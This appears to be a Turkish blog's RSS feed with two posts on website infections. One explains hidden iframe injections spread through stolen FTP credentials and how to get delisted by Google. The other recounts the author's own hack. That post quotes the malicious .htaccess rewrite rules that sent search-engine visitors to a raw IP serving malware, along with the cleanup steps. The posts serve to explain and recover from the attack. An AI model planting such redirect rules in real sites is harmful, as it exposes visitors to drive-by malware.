<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Fatih Hayrioğlu&#039;nun not defteri &#187; malware</title>
	<atom:link href="http://www.fatihhayrioglu.com/tag/malware/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.fatihhayrioglu.com</link>
	<description>{ CSS, HTML ve Javascript }</description>
	<lastBuildDate>Mon, 09 Jan 2012 08:44:45 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=2012</generator>
		<item>
		<title>iframe virüsü ve Saldırgan Site damgalamasından kurtulmanın yolu</title>
		<link>http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/</link>
		<comments>http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/#comments</comments>
		<pubDate>Sat, 15 Aug 2009 20:51:00 +0000</pubDate>
		<dc:creator>fatih.hayrioglu</dc:creator>
				<category><![CDATA[XHTML]]></category>
		<category><![CDATA[google-web-master-tools]]></category>
		<category><![CDATA[iframe]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://www.fatihhayrioglu.com/?p=1314</guid>
		<description><![CDATA[Yaklaşık 2-3 haftadır bir çok yerde karşılaştığımız bu sorunun kaynağının ne olduğu konusunda bir çok makale okudum. Çözümler okudum uygulamalar yaptım sonuç olarak konuyu şöyle özetleyebiliriz. Çeşitli yollardan bize musallat olan virüs(aslında pek virüs mantığı ile hareket etmiyor.) Sistemimizdeki ftp bilgilerini alıp bu bilgiler üzerinden sitelere otomatik olarak bir iframe kodu ekliyor. Genellikle index.xxx ve [...]]]></description>
			<content:encoded><![CDATA[<p>Yaklaşık 2-3 haftadır bir çok yerde karşılaştığımız bu sorunun kaynağının ne olduğu konusunda bir çok makale okudum. Çözümler okudum uygulamalar yaptım sonuç olarak konuyu şöyle özetleyebiliriz.</p>
<p>Çeşitli yollardan bize musallat olan virüs(aslında pek virüs mantığı ile hareket etmiyor.) Sistemimizdeki ftp bilgilerini alıp bu bilgiler üzerinden sitelere otomatik olarak bir iframe kodu ekliyor. Genellikle index.xxx ve default.xxx isimli dosyalara otomatik olarak eklenen bir iframe kodu bu. Eklenen bu iframe kodu bazen boş bir sayfayı açarken bazende malware olarak adlandırılan kullanıcının bilgisayarına sızan bir virüs yükletmeye çalışıyor. Eklenen bu iframe genelde gizli olarak kodlandığı için(visibility:hidden) göremiyoruz.</p>
<p><img src="http://www.fatihhayrioglu.com/wp-content/iframe_kodu1.gif" alt="iframe_kodu" title="iframe_kodu" width="465" height="69" class="alignnone size-full wp-image-1322" /></p>
<p>Belli bir süre sonra Google siteyi tararken bu kodlamayı görüyor ve linki takip edincede siteden virüs yayılmaya çalışıyor diye sitenizi Saldırgan Site sınıflandırmasını sokuyor. </p>
<p><img src="http://www.fatihhayrioglu.com/wp-content/google-warning-300x127.jpg" alt="google-warning" title="google-warning" width="300" height="127" class="alignnone size-medium wp-image-1316" /></p>
<p>Saldırgan Site sınıfına giren sitemiz Google Chrome ve Firefox ile sitemize açmayan kişilere yukarıdakine benzer bir ekran ile karşılık verecektir ve kullanıcılar sitenize erişemeyecektir. </p>
<p>Peki biz bu işten nasıl kurtulacağız. İlk olarak siteden bu kodları arayıp(genelde body etiketi sonrasına eklendiği için bulmak kolay.) bulup kaldıracağız. Ayrıca bilgisayarımızı sağlam bir virüs taramasından geçirip, tüm ftp şifrelerimizi değiştirmeyi unutmayalım. </p>
<p>Bir sonraki adım olarak google&#8217;un saldırgan site listesinden çıkmak için <A id="wben" href="http://www.google.com/webmasters/tools/" title="Google Webmaster Tools">Google Webmaster Tools</A>&#8216;una gireceğiz.</p>
<p>Siteye girdikten sonra sırası ile(İngilizce seçili olarak girdiğiniz farz ederek devam edeceğim. İşlerin hızlı yürümesi için İngilizceyi tercih etmenizi öneririm)</p>
<ul>
<li><strong>Add Site</strong> deyip sitemizi ekleyeceğiz. <strong>http://www.orneksite.com/</strong></li>
<li><strong><strong>Continue </strong>basıp ilerleyince karşımıza<strong> </strong><strong>Site verification</strong> </strong>sayfası çıkacak. Sitenin bize ait olup olmadığını kontrol için</li>
<li>Burada iki tür doğrulama isteniyor bizden <strong>Meta tag</strong> ve <strong>HTML file</strong> diye iki yolumuz var. Ben Meta tag&#8217;i seçip ilerliyorum. </li>
<li>Site bize bir meta etiketi veriyor. Bu kodu alıp sitemize(&lt;head&gt;&#8230;&lt;/head&gt; arasına) ekliyoruz. Sadece ana sayfaya eklemek yeterli. </li>
</ul>
<p><img src="http://www.fatihhayrioglu.com/wp-content/google-webmaster-tools-300x173.png" alt="google-webmaster-tools" title="google-webmaster-tools" width="300" height="173" class="alignnone size-medium wp-image-1317" /></p>
<p>Sonra sitenin bize ait olduğunu anlayan goole bize sitemizin saldırgan site olarak listelendiğini söylüyor ve bundan kurtulmak için bir çare gösteriyor. </p>
<p><img src="http://www.fatihhayrioglu.com/wp-content/badware-300x154.png" alt="badware" title="badware" width="300" height="154" class="alignnone size-medium wp-image-1318" /></p>
<p><strong>Request a review</strong> linkine tıklıyoruz. İşaret kutucuğunu işaretleyip metin girdi alanına bir cümlelik bir  durum beyan ediyoruz. </p>
<p>Bu işlemlerden sonra google yaklaşık olarak 2-3 saat içinde sitemizi saldırgan site listesinden çıkarıyor.</p>
<h3>Kaynaklar</h3>
<ul>
<li>http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites</li>
<li>http://www.cogzidel.com/blog/2009/07/malware-affects-your-google-listing-google-webmaster-tools-will-save-you/</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/feed/</wfw:commentRss>
		<slash:comments>41</slash:comments>
		</item>
		<item>
		<title>Hacklendik</title>
		<link>http://www.fatihhayrioglu.com/hacklendik/</link>
		<comments>http://www.fatihhayrioglu.com/hacklendik/#comments</comments>
		<pubDate>Tue, 18 Nov 2008 20:15:25 +0000</pubDate>
		<dc:creator>fatih.hayrioglu</dc:creator>
				<category><![CDATA[Haberler]]></category>
		<category><![CDATA[apache]]></category>
		<category><![CDATA[ftp]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[htaccess]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.fatihhayrioglu.com/?p=770</guid>
		<description><![CDATA[Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda http://wordpress.org/support/topic/217700 Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen yönlendirme kodu nedeni ile yaşamışım bu sorunları. Ayrıca yazılarımın için yerleştirilmiş [...]]]></description>
			<content:encoded><![CDATA[<p>Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda <a href="http://wordpress.org/support/topic/217700">http://wordpress.org/support/topic/217700</a> Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen<br />
yönlendirme kodu nedeni ile yaşamışım bu sorunları.</p>
<p>Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi.</p>
<p>Yukarıdaki linkdeki işlemleri tek tek yaptım</p>
<p>- htaccess dosyasını sildim.<br />
- ftp şifremi değiştirdim<br />
- hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim.</p>
<p>Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.</p>
<p>RewriteEngine On<br />
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]<br />
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]<br />
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]</p>
<p>Bu arada cute ftp&#8217;de htaccess görüntülemeyide öğrendik.<br />
<a href="http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html">http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html</a></p>
<p>Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com&#8217;da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google&#8217;un bunu görüp sitemi kapatması. Google&#8217;un ve Firefox&#8217;un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim  ve  StopBadware.org&#8217;daki formuda doldurdum. Neyse hayırlısı bakalım. </p>
<p>Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.</p>
<h3 style="color:#f00">Ek olarak</h3>
<p>Ayrıca </p>
<p>http://www.fatihhayrioglu.com/?ref=siteAdi</p>
<p>gibi linkler var. Bunlarıda robots.txt</p>
<p>User-agent: *<br />
Disallow: /*ref=*<br />
Disallow: /*?ref=</p>
<p>kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google&#8217;un arama aracı nasıl buluyor.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.fatihhayrioglu.com/hacklendik/feed/</wfw:commentRss>
		<slash:comments>43</slash:comments>
		</item>
	</channel>
</rss>

